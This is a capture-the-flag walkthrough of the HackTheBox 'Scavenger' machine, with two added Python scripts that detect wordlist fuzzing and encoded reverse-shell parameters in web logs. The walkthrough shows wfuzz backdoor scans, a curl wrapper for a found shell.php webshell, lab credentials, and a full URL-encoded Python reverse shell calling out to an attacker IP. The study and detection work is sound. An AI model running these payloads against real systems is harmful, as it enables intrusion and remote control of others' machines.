HackTheBox – Scavenger

Add these hostnames to /etc/hosts (on the line for the target's IP): www.supersechosting.htb www.justanotherblog.htb www.pwnhats.htb www.rentahacker.htb

Add this entry to /etc/hosts as well: sec03.rentahacker.htb

At the login page we see the message: Warning: You should disable the default 'administrator' account or change its password. This tells us that the default credentials may not have been changed!

Trying the default login administrator:root, we get access:

root@kali:~/Downloads# wfuzz -w /usr/share/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt -t 20 --hc 404 http://sec03.rentahacker.htb/FUZZ

root@kali:~/Downloads# wfuzz -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -t 20 --hh 0 http://sec03.rentahacker.htb/shell.php?FUZZ=id
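From the defender's side, both wfuzz runs above leave the same footprint in the web server's access log: one client, many distinct request targets, near-identical responses, all inside a short window. The path scan produces a burst of 404s of identical size; the parameter-name scan hits the same page and gets an identical (here empty) 200 body for every candidate. The script below is an added example, not part of the original writeup: it parses Apache/nginx combined-format lines and flags clients whose sliding window of traffic shows that pattern. The log lines it runs on are constructed samples; the IPs, paths and thresholds are assumptions.

```python
"""Added example (not part of the original writeup): spot wordlist scans like the
two wfuzz runs above in an Apache/nginx combined-format access log.

A path scan (many 404s of identical size) and a parameter-name scan (the same
page answering 200 with an identical body to every candidate) share one
footprint: one client, many distinct request targets, near-identical responses,
in a short window. The log lines below are constructed samples."""
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta, timezone

TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line):
    """Parse one combined-format line; returns None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def find_fuzzing(lines, window=timedelta(seconds=60), min_requests=20,
                 min_distinct=15, min_uniform=0.8):
    """Return {ip: summary} for clients whose traffic in some sliding window has
    at least min_requests requests to at least min_distinct distinct targets,
    where a single (status, size) pair accounts for min_uniform of the responses."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_ip[rec["ip"]].append(rec)

    hits = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        start = 0
        for end in range(len(recs)):
            # advance the window start so that recs[start:end+1] spans <= window
            while recs[end]["ts"] - recs[start]["ts"] > window:
                start += 1
            win = recs[start:end + 1]
            if len(win) < min_requests:
                continue
            distinct = len({r["target"] for r in win})
            (status, size), n = Counter((r["status"], r["size"]) for r in win).most_common(1)[0]
            uniform = n / len(win)
            if distinct >= min_distinct and uniform >= min_uniform:
                best = hits.get(ip)
                if best is None or len(win) > best["requests"]:
                    hits[ip] = {
                        "requests": len(win),
                        "distinct_targets": distinct,
                        "dominant_response": f"{status}/{size}",
                        "uniform_share": round(uniform, 2),
                        "first": win[0]["ts"].isoformat(),
                        "last": win[-1]["ts"].isoformat(),
                    }
    return hits


def sample_log():
    """Constructed sample: a path scan and, two minutes later, a parameter-name
    scan from 10.0.0.5, plus ordinary browsing from 10.0.0.9."""
    base = datetime(2020, 1, 1, 12, 0, 0, tzinfo=timezone.utc)
    ua = '"-" "Mozilla/5.0"'
    lines = []
    for i in range(25):
        t = (base + timedelta(seconds=i)).strftime(TS_FMT)
        lines.append(f'10.0.0.5 - - [{t}] "GET /candidate{i}.php HTTP/1.1" 404 275 {ua}')
    for i in range(25):
        t = (base + timedelta(seconds=120 + i)).strftime(TS_FMT)
        lines.append(f'10.0.0.5 - - [{t}] "GET /shell.php?param{i}=id HTTP/1.1" 200 0 {ua}')
    for i in range(25):
        t = (base + timedelta(seconds=2 * i)).strftime(TS_FMT)
        lines.append(f'10.0.0.9 - - [{t}] "GET /blog/post-{i} HTTP/1.1" 200 {1000 + 37 * i} {ua}')
    return lines


if __name__ == "__main__":
    for ip, summary in find_fuzzing(sample_log()).items():
        print(ip, summary)
```

The response-uniformity measure is what separates a scan from a busy legitimate client: a real visitor also touches many distinct URLs, but the sizes and statuses vary, whereas a wordlist run gets the same answer over and over. Tune window and thresholds to the site's normal traffic before alerting on it.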

CODE:

#!/bin/bash
# Wrapper for the shell.php backdoor found above: URL-encodes the command
# given as arguments and passes it in the hidden= parameter.
# urlencode comes from the gridsite-clients package (installed below).
HOST=sec03.rentahacker.htb
CMD=$(urlencode "$*")
curl -s \
     "http://$HOST/shell.php?hidden=$CMD"

The urlencode binary used by the script comes from the gridsite-clients package:

root@kali:~/Downloads# sudo apt-get install gridsite-clients

FTP:

Username: ib01ftp

Password: YhgRt56_Ta

Email: pwnhats@pwnhats.htb

Password: GetYouAH4t!

The same password also works for “ib01c01”.

http://www.pwnhats.htb/admin530o6uisg/index.php?controller=AdminLogin&token=de267fd50b09d00b04cca76ff620b201

Now try the FTP credentials obtained earlier:

ib01c01:GetYouAH4t!

http://sec03.rentahacker.htb/shell.php?hidden=echo%20%27g3tPr1v%27%3E/dev/ttyR0;python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((%220.0.0.0%22,20));s.connect((%2210.10.15.194%22,1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
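A request like the one above is easy to miss in a log because the whole command is percent-encoded inside a single query parameter. The script below is an added example, not part of the original writeup: it decodes each query value (repeatedly, so a double-encoded value is inspected in its final form) and reports which reverse-shell and device-redirection indicators the decoded text contains, the kind of check a WAF rule or a log-triage job would run over proxy logs. The hostnames, payload fragments and indicator list are constructed assumptions, and the second sample only mimics the shape of the page's request; it is not a working payload.

```python
"""Added example (not part of the original writeup): triage of command-style
parameters in web access or proxy logs. Each query value is percent-decoded
until stable and then matched against reverse-shell and device-redirection
indicators. Hostnames and payload fragments are constructed samples."""
import re
from urllib.parse import unquote, urlsplit

# Indicator patterns checked against the fully decoded parameter value.
INDICATORS = {
    "socket": re.compile(r"\bimport\s+socket\b|socket\.socket\("),
    "dup2": re.compile(r"\bdup2\("),
    "subprocess": re.compile(r"\bsubprocess\b"),
    "shell_binary": re.compile(r"/bin/(?:ba)?sh\b"),
    "interactive_shell": re.compile(r"\b(?:ba)?sh\s+-i\b"),
    "dev_tcp": re.compile(r"/dev/tcp/"),
    "netcat": re.compile(r"\b(?:nc|ncat|netcat)\b"),
    "device_redirect": re.compile(r">\s*/dev/"),
}


def decode_fully(value, max_rounds=3):
    """Percent-decode until the value stops changing (bounded), so that a
    double-encoded value is inspected in its final form."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def triage_url(url, min_indicators=2):
    """Return one finding per query parameter: the decoded value, the indicator
    names that matched, and whether the count reaches min_indicators."""
    query = urlsplit(url).query
    findings = []
    for pair in query.split("&"):
        if not pair:
            continue
        # split on the first '=' only; ';' and later '=' stay inside the value
        name, _, raw = pair.partition("=")
        value = decode_fully(raw)
        matched = [label for label, rx in INDICATORS.items() if rx.search(value)]
        findings.append({
            "param": unquote(name),
            "decoded": value,
            "indicators": matched,
            "suspicious": len(matched) >= min_indicators,
        })
    return findings


def suspicious_params(urls):
    """(url, parameter) pairs whose decoded value crossed the threshold."""
    return [(u, f["param"]) for u in urls for f in triage_url(u) if f["suspicious"]]


# Constructed sample requests: a benign admin page load, a shell-shaped command
# fragment (deliberately incomplete), and a double-encoded value.
SAMPLE_URLS = [
    "http://shop.example.htb/index.php?controller=AdminLogin&lang=en",
    ("http://shop.example.htb/shell.php?hidden=echo%20%27x%27%3E/dev/ttyS0;"
     "python%20-c%20%27import%20socket,subprocess,os;os.dup2(s.fileno(),0);"
     "subprocess.call(%5B%22/bin/sh%22,%22-i%22%5D)%27"),
    "http://shop.example.htb/shell.php?hidden=%252Fbin%252Fsh%2520-i",
]


if __name__ == "__main__":
    for u in SAMPLE_URLS:
        for f in triage_url(u):
            print(f["param"], f["indicators"], "SUSPICIOUS" if f["suspicious"] else "ok")
```

Requiring two independent indicators keeps a single word such as "nc" in ordinary text from alerting, while the bounded re-decoding loop makes sure an extra layer of encoding does not hide the content from the patterns. The same check belongs on the response side as well: a parameter like hidden= that returns command output for arbitrary values is the stronger signal that a webshell is present.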

@SAKSHAM DIXIT